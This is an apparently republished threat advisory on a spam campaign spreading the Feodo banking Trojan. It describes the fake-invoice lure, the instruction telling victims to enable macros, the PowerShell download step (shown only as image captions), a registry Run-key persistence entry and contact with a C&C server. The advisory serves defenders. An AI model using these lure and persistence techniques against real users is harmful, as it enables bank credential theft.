Sign Up for FREE Daily Energy News
 
BREAKING NEWS:
Copper Tip Energy Services
Hazloc Heaters
WEC - Western Engineered Containment
Copper Tip Energy
Hazloc Heaters
WEC - Western Engineered Containment

Active Spam Campaign is Spreading a Banking Trojan Known as “Feodo” – Here’s What to Look For – Startech Business Systems


The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. This spam uses a very common tactic of sending a fake invoice or bank statement as an attachment with a link that leads to downloading malware.

Infection cycle:

The spam email purports to be from a bank or vendor or business supplier typically with a PDF or DOC attachment as show below.

Opening the PDF file, for instance, will then have a link to download your invoice or statement.

 

Clicking on the link will then download a document file which has embedded Visual Basic macros.

These macros will launch complex procedures when the document is opened. Macro security setting in the Trust Center is disabled by default and a security warning will appear once macro is detected within a document file. To circumvent this, the body of the document file actually instructs the victim to enable editing and enable content to view the document.

spam_doc-705x467-startech4

Once the Visual Basic script executes, cmd.exe is spawned which then executes powershell that will then download the banking Trojan.

spam_spawn-startech5

Below is an example of what commands were executed by cmd and powershell to perform this malicious task:

spam_spawn-startech7

spam_powershell-startech8

It then executes the downloaded Feodo Trojan. The trojan copied itself as “pagesrouted.exe” and registered itself in the registry to ensure persistence.

  • HKLM/Software/Microsoft/Windows/CurrentVersion/Run  pagesrouted   “%APPDATA%/Local/Wndows/pagesrouted.exe”

During our analysis, the Trojan just runs quietly in the background. Once we opened a browser instance and logged onto an online banking website, it then contacted a known Feodo C&C server and sent encrypted data.

spam_cc-450x293-startech9

During the past week, we have observed this threat spread throughout the United States, Germany, India and Brazil.

spam_geo-705x360-startech10

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Feodo.S (Trojan)
  • GAV: Feodo.S _2 (Trojan)

Contact Startech today for information about our Social Engineering, Penetration tests and other IT assessments and services today!



Share This:



More News Articles


New SHOWCASE Directory Companies

 

GLJ Petroleum Consultants Ltd.
Hy-Lok Distribution Inc
Catch Engineering
DTN
Pacbrake Company
Clear Glycol Inc.
Enverus
Fusion Production Systems Inc